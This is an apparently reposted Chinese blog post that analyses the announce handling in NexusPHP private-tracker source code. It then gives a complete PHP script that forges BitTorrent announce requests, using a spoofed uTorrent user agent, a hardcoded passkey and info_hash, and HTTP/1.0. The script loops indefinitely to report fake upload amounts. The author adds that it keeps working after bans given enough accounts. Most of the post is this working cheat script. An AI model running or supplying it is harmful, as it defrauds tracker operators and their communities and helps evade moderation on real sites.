NexusPHP traker源码分析 模拟CC攻击

源码网上可以找 

第一步 分析源码

    //1.分析客户端 默认的允许的客户端请参照各大站
  $agent = $_SERVER["HTTP_USER_AGENT"];
  block_browser();


  //2.分析参数 这几个参数必须有
  foreach (array("passkey","info_hash","peer_id","event") as $x)
  {
      if(isset($_GET["$x"]))
      $GLOBALS[$x] = $_GET[$x];
  }

  foreach (array("port","downloaded","uploaded","left","compact","no_peer_id") as $x)
  {
      $GLOBALS[$x] = 0 + $_GET[$x];
  }

  //3.端口 用常识填一个就行了
  if (!$port || $port > 0xffff)
      err("invalid port");
  if (!ip2long($ip)) //Disable compact announce with IPv6
      $compact = 0;



//中间发包间隔是30s 速度不超过100Mb/s

  

burp抓包确认

 

上传个源码。。。 请大家不要恶搞 谢谢 nexus就算被封号 一样可以有效上传 只要号足够多。。。你懂的

<?php
	set_time_limit(0);
	for ($i=1; $i < 100000000; $i++) { 
		shuafen3($i);
		ob_flush();
		flush();
		sleep(40);
	}
	function shuafen3($i){
		/*
		伪造头 其实只要user agent 其他可以忽略
		*/
	 	$headers[‘User-Agent‘] = ‘uTorrent/342(109414725)(35141)‘;
	 	$headerArr = array(); 
	 	foreach( $headers as $n => $v ) { 
	 	    $headerArr[] = $n .‘:‘ . $v;  
	 	}

	 	/*
		绝对不要用http_build_query() 会对参数和值encode 但是源码中并没有decode 会导致info_hash错误 
		所以拼url就可以
	 	*/
	 	$url =  SITE_URL;
	 	$url .= ‘passkey=e0d3629ea5ab14bb2c2f74a3ed48c696&‘;
	 	$url .= ‘info_hash=E%00%b3%ca%de3W4%f7j%9b%7b%86G%fdV8%e9p%3c&‘;
	 	$url .= ‘peer_id=-UT3420-E%89y%aaP%bfW%e0%a1%ed%d9W&‘;
	 	$url .= ‘port=60579&‘;
	 	$url .= ‘uploaded=‘.(0+$i*73400320).‘&‘;
	 	$url .= ‘downloaded=0&‘;
	 	$url .= ‘left=43399315456&‘;
	 	$url .= ‘corrupt=0&‘;
	 	$url .= ‘key=01E9E5A9&‘;
	 	$url .= ‘event=started&‘;
	 	$url .= ‘numwant=200&‘;
	 	$url .= ‘compact=1&‘;
	 	$url .= ‘no_peer_id=1‘;
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_HTTPHEADER, $headerArr);
		curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
		//必须使用http 1.0 协议 1.1的协议会对数据压缩 traker不认
		$response = curl_exec($ch);
		if(curl_errno($ch)){
			print curl_errno($ch).‘ - ‘.curl_error($ch);
			echo curl_getinfo($ch, CURLINFO_HTTP_CODE);
		}
		curl_close($ch);
		echo iconv("UTF-8", "GBK//IGNORE",$response).‘<br /><br /><br />‘;
	}
?>

个人兴趣 和站长提了几个漏洞 被站长喷SB 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。